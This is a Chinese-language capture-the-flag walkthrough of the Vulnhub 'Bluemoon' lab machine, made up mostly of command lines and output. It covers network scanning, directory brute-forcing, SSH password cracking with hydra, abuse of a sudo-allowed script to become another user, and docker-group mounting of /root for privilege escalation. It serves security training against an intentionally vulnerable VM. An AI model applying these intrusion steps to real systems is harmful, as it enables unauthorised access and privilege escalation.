Vulnhub Bluemoon靶机解题详细过程
Bluemoon
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.92.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:fd:b9:2d 1 60 PCS Systemtechnik GmbH
192.168.56.117 08:00:27:14:4c:68 1 60 PCS Systemtechnik GmbH 1
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.117
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.117 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 21:46 EST
Nmap scan report for bogon (192.168.56.117)
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2c:e2:63:78:bc:55:fe:f3:cb:09:a9:d8:26:2f:cb:d5 (RSA)
| 256 c4:c8:6b:48:92:25:a5:f7:00:9f:ab:b2:56:d5:ed:dc (ECDSA)
|_ 256 a9:5b:39:a1:6e:05:91:0f:75:3c:88:0b:55:7c:a8:c2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: BlueMoon:2021
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:14:4C:68 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds
目标主机有3个开放端口21(ftp服务)、22(ssh服务)以及80(http服务)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ searchsploit vsftpd 3.0.3
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.
FTP服务vsftpd没有可以利用的漏洞,不允许匿名访问。
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ steghide extract -sf .blue.jpg
Enter passphrase
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ stegseek .blue.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.91% (133.3 MB)
[!] error: Could not find a valid passphrase.
:
下载到Kali Linux本地的图片似乎有密码,但是破解失败。
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.117 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ gobuster dir -u http://192.168.56.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.117
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/14 22:03:52 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
/hidden_text (Status: 200) [Size: 1169]
Progress: 219133 / 220561 (99.35%)===============================================================
2022/11/14 22:04:35 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/hidden_text
<!doctype html>
<html>
<head>
<title>Undergoing Work</title>
<link rel="icon" href=".blue.jpg" type="image/icon type">
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}
</style>
</head>
<body>
<div>
<h1>Maintanance!</h1>
<p>Sorry For Delay. We Will Recover Soon. </p>
<p><a href=".QR_C0d3.png">Thank You ...</a></p>
</div>
</body>
</html>
目标扫描所发现的/hidden_text目录,通过浏览器访问该目录,返回页面包含一个隐藏的图片,为二维码图片,扫描得到以下信息:
#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF
这应该是FTP的用户名和密码,尝试以下:
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): userftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61671|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Mar 07 2021 information.txt
-rw-r--r-- 1 0 0 363 Mar 07 2021 p_lists.txt
226 Directory send OK.
ftp> get information.txt
local: information.txt remote: information.txt
229 Entering Extended Passive Mode (|||35007|)
150 Opening BINARY mode data connection for information.txt (147 bytes).
100% |**************************************************************************************************| 147 163.68 KiB/s 00:00 ETA
226 Transfer complete.
147 bytes received in 00:00 (77.89 KiB/s)
ftp> get p_lists.txt
local: p_lists.txt remote: p_lists.txt
229 Entering Extended Passive Mode (|||61257|)
150 Opening BINARY mode data connection for p_lists.txt (363 bytes).
100% |**************************************************************************************************| 363 3.14 KiB/s 00:00 ETA
226 Transfer complete.
363 bytes received in 00:00 (3.12 KiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||22391|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Mar 07 2021 .
drwxr-xr-x 3 1001 1001 4096 Mar 07 2021 ..
-rw-r--r-- 1 0 0 147 Mar 07 2021 information.txt
-rw-r--r-- 1 0 0 363 Mar 07 2021 p_lists.txt
226 Directory send OK.
ftp> quit
221 Goodbye.
查看以下从FTP服务器中下载到Kali Linux本地的文件是什么内容:
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ls
information.txt nmap_full_scan p_lists.txt
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat information.txt
Hello robin ...!
I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat p_lists.txt
h4ck3rp455wd
4dm1n
Pr0h4ck3r
5cr1ptk1dd3
pubgpr0pl4yer
H34d5h00t3r
p@ssw0rd
@@d1dn0tf1nd
J4ck_5p4rr0w
c4pt10n_jack
D0veC4m3r0n
f1nnb4l0r
r0manr3ing5
s3thr0lin5
Demonk1ng
R4ndy0rton
Big_sh0w
j0hnc3na
5tr0ngp@ssw0rd
S4br1n4
4nnlyn
C4rp3nt3r
K0fiKing5t0n
chNAMPIN
Herr0lins
G0palT0p3r
Log3shDriv3r
k4rv3ndh4nh4ck3r
P0nmuGunth0n
Shank3rD3v
KishorMilkV4n
S4th15hR4cer
这里提示用户名是robin,而p_list文件可以作为字典,接下来用hydra来破解一i啊
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ hydra -l robin -P p_lists.txt 192.168.56.117 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-14 22:12:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.56.117:22/
[22][ssh] host: 192.168.56.117 login: robin password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-14 22:12:16
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ssh robin@192.168.56.117
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:C+Z/8na2o0LXAqk7WswSnNQya1ZPegq4CyO9DR+VXTw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.117' (ED25519) to the list of known hosts.
robin@192.168.56.117's password:
Linux BlueMoon 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 07:43:48 2021 from 192.168.43.44
robin@BlueMoon:~$ id
uid=1000(robin) gid=1000(robin) groups=1000(robin),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
robin@BlueMoon:~$
成功得到用户robin的shell
robin@BlueMoon:~$ sudo -l
Matching Defaults entries for robin on bluemoon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User robin may run the following commands on bluemoon:
(jerry) NOPASSWD: /home/robin/project/feedback.sh
发现robin可以不用密码以jerry身份执行feedback.sh脚本,看是不是可以直接拿到jerry的shell
Script For FeedBack
Enter Your Name : jason
Enter You FeedBack About This Target Machine : /bin/bash
id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
jerry@BlueMoon:/home/robin$ cd /home
jerry@BlueMoon:/home$ ls
jerry robin userftp
jerry@BlueMoon:/home$ cd jerry
jerry@BlueMoon:~$ ls -alh
total 32K
drwxr-xr-x 3 jerry jerry 4.0K Apr 4 2021 .
drwxr-xr-x 5 root root 4.0K Mar 8 2021 ..
-rw------- 1 jerry jerry 16 Nov 14 19:16 .bash_history
-rw-r--r-- 1 jerry jerry 220 Apr 17 2019 .bash_logout
-rw-r--r-- 1 jerry jerry 3.5K Apr 17 2019 .bashrc
drwxr-xr-x 3 jerry jerry 4.0K Mar 8 2021 .local
-rw-r--r-- 1 jerry jerry 807 Apr 17 2019 .profile
-rw-r----- 1 jerry jerry 178 Mar 8 2021 user2.txt
jerry@BlueMoon:~$ cat user2.txt
You Found User-2 Flag
==> Fl4g{Y0ur34ch3du53r25uc355ful1y}
You Are Reached Near To Me... Try To Find
- Root
jerry@BlueMoon:~$ cd .local
提权
jerry@BlueMoon:~/.local$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
用户jerry是docker组成员,而docker 有root权限,所以开始挂载
jerry@BlueMoon:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest 28f6e2705743 21 months ago 5.61MB
jerry@BlueMoon:~$ docker run -v /root:/mnt -it -alpine
invalid argument "lpine" for "-a, --attach" flag: valid streams are STDIN, STDOUT and STDERR
See 'docker run --help'.
jerry@BlueMoon:~$ docker run -v /root:/mnt -it alpine
/ # ls
bin etc lib mnt proc run srv tmp var
dev home media opt root sbin sys usr
/ # cd /root
~ # cd /mnt
/mnt # ls
root.txt
/mnt # cat root.txt
==> Congratulations <==
You Reached Root...!
Root-Flag
Fl4g{r00t-H4ckTh3P14n3t0nc34g41n}
Created By
Kirthik - Karvendhan
instagram = ____kirthik____
!......Bye See You Again......!
/mnt #
成功拿到root flag!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
